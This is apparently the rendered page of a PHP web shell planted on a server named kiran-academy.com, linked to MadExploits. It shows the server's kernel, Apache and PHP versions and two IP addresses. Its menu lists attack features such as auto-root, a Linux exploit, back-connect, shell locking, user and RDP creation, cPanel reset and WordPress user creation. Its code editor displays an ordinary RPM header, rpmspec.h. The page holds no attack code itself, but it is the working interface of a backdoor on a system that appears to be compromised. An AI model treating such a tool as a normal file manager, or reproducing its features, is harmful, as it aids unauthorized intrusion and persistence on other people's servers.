Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpmspec.h
#ifndef _H_SPEC_ #define _H_SPEC_ /** \ingroup rpmbuild * \file build/rpmspec.h * The rpmSpec and Package data structures used during build. */ #include <rpm/rpmstring.h> /* StringBuf */ #include <rpm/rpmcli.h> /* for QVA_t */ #ifdef __cplusplus extern "C" { #endif /** \ingroup rpmbuild */ typedef struct Package_s * rpmSpecPkg; typedef struct Source * rpmSpecSrc; typedef struct rpmSpecIter_s * rpmSpecPkgIter; typedef struct rpmSpecIter_s * rpmSpecSrcIter; enum rpmSourceFlags_e { RPMBUILD_ISSOURCE = (1 << 0), RPMBUILD_ISPATCH = (1 << 1), RPMBUILD_ISICON = (1 << 2), RPMBUILD_ISNO = (1 << 3), }; typedef rpmFlags rpmSourceFlags; #define RPMBUILD_DEFAULT_LANG "C" enum rpmSpecFlags_e { RPMSPEC_NONE = 0, RPMSPEC_ANYARCH = (1 << 0), RPMSPEC_FORCE = (1 << 1), RPMSPEC_NOLANG = (1 << 2), }; typedef rpmFlags rpmSpecFlags; /** \ingroup rpmbuild * Destroy Spec structure. * @param spec spec file control structure * @return NULL always */ rpmSpec rpmSpecFree(rpmSpec spec); /* Iterator for spec packages */ rpmSpecPkgIter rpmSpecPkgIterInit(rpmSpec spec); rpmSpecPkg rpmSpecPkgIterNext(rpmSpecPkgIter iter); rpmSpecPkgIter rpmSpecPkgIterFree(rpmSpecPkgIter iter); /* Getters for spec package attributes */ Header rpmSpecPkgHeader(rpmSpecPkg pkg); /* Iterator for spec sources */ rpmSpecSrcIter rpmSpecSrcIterInit(rpmSpec spec); rpmSpecSrc rpmSpecSrcIterNext(rpmSpecSrcIter iter); rpmSpecSrcIter rpmSpecSrcIterFree(rpmSpecSrcIter iter); /* Getters for spec source attributes */ rpmSourceFlags rpmSpecSrcFlags(rpmSpecSrc src); int rpmSpecSrcNum(rpmSpecSrc src); const char * rpmSpecSrcFilename(rpmSpecSrc src, int full); /* * Retrieve parsed spec script section (RPMBUILD_PREP, RPMBUILD_BUILD etc). * As a special case, RPMBUILD_NONE as section returns the entire spec in * preprocessed (macros expanded etc) format. */ const char * rpmSpecGetSection(rpmSpec spec, int section); /** \ingroup rpmbuild * Function to query spec file(s). * @param ts transaction set * @param qva parsed query/verify options * @param arg query argument * @return 0 on success, else no. of failures */ int rpmspecQuery(rpmts ts, QVA_t qva, const char * arg); #ifdef __cplusplus } #endif #endif /* _H_SPEC_ */
Close